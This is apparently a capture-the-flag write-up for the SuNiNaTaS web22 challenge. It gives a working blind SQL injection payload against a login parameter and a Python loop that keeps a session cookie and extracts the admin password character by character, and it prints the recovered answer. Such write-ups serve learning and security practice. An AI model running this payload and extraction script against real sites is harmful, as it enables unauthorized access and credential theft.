Payload for the id parameter (blind SQL injection, one character of pw at a time):

admin' and(substring(pw,1,1)='a')--

When the injected condition is true the page answers with "OK admin"; when it is false it does not, so the response text is the oracle. Everything after -- is commented out, so the pw parameter only has to be present.

As a URL:

http://www.suninatas.com/Part_one/web22/web22.asp?id=admin' and(substring(pw,1,1)='a')--&pw=1

The same test against the guest account, URL-encoded the way the browser sends it:

http://www.suninatas.com/Part_one/web22/web22.asp?id=guest%27+and%28substring%28pw%2C1%2C1%29%3D%27g%27%29--&pw=1

First attempt at automating it. The login request has to come first, but as written nothing keeps the session cookie between requests (section 1 fixes that):

>>> import urllib.request
>>> resp = urllib.request.urlopen("http://www.suninatas.com/member/mem_action.asp?Hid=ludwings&Hpw=")
>>> resp.read()
>>> words = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()_+=-~"
>>> param = "id=admin' and(substring(pw,1,1)='a')--&pw=1"

====

1. Keeping the login session

The site wants a login before the challenge page answers, so log in once and keep the cookie: an opener built with HTTPCookieProcessor stores the cookie in the jar and sends it with every later request made through the same opener.

>>> import http.cookiejar
>>> import urllib.request
>>> import urllib.parse
>>>
>>> cj = http.cookiejar.CookieJar()
>>> opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
>>> resp = opener.open("http://www.suninatas.com/member/mem_action.asp?Hid=ludwings&Hpw=")
>>> print(resp.read())
b'\r\n<script language="javascript">\r\n\tvar auth1 = "1";\r\n\tvar auth  = auth1*1;\r\n\r\n\tif (auth == "0"){\r\n\t\talert("Plese Login First!");\r\n\t\tparent.document.location.href="../member/mem_action.asp?licen=login_out";\r\n\t}else{\r\n\t\talert("Welcome To SuNiNaTaS!");\r\n\t\tparent.document.location.href="../main/main.asp";\r\n\t}\r\n</script>'

auth1 = "1" in the response means the login went through (the script jumps to "Welcome To SuNiNaTaS!").

2. Bytes to string

resp.read() returns bytes, not str, so .find('OK') will not work on it directly; decode first:
resp.read().decode('utf-8')

>>> words = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()_+=-~[]?;:'><.,`/{}"
>>> param1 = 'http://www.suninatas.com/Part_one/web22/web22.asp?id=admin%27+and%28substring%28pw%2C1%2C1%29%3D%27'
>>> param2 = '%27%29--&pw=1'
>>>

param1 + words[i] + param2 is the URL-encoded form of

admin' and(substring(pw,n,1)=words[i])--

with n = 1 baked into param1 (%2C1%2C1%29 is ",1,1)"). For i = 0 it is the same request as the first test above:

admin' and(substring(pw,1,1)='a')--

Step through words until the page says OK, record the character, then move on to the next n. After the first two positions:

N1

and once every position has been done:

N1c3Bilnl


3. Special characters have to be encoded..

Putting the candidate character into the URL as-is ran into this:

urllib.error.HTTPError: HTTP Error 406: Not Acceptable

Several characters in the list (', &, #, +, ?, %, =) have their own meaning in a URL or query string, so sent raw they either break the injected SQL or get parsed as part of the query string instead of as the candidate. The list below, with %, =, ; and ` taken out, is what the loop was run with after the error; percent-encoding each candidate with urllib.parse.quote is the real fix, because it lets every character in the list be tested instead of silently skipping some. The loop needs the opener from section 1 (the one holding the login cookie), and since pw turned out to be 9 characters, positions 1 to 10 are enough to see the stop; the original numbers="123456789" with range(10) would have raised IndexError on the last round.

>>> import urllib.parse
>>> words = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$^&*()_+-~[]?:'><.,/{}"
>>> base = 'http://www.suninatas.com/Part_one/web22/web22.asp?id=admin%27+and%28substring%28pw%2C'
>>> param2 = '%27%29--&pw=1'
>>> for n in range(1, 11):                   # positions 1..10 of pw
...  for ch in words:
...   # admin' and(substring(pw,n,1)='ch')-- with ch percent-encoded
...   full_param = base + str(n) + '%2C1%29%3D%27' + urllib.parse.quote(ch, safe='') + param2
...   resp = opener.open(full_param)          # opener from section 1 keeps the login cookie
...   body = resp.read().decode('utf-8')      # bytes -> str
...   if body.find('OK') > -1:
...    print(ch)
...    break
...  else:                                    # no candidate matched: past the end of pw
...   break

Posted by ludwings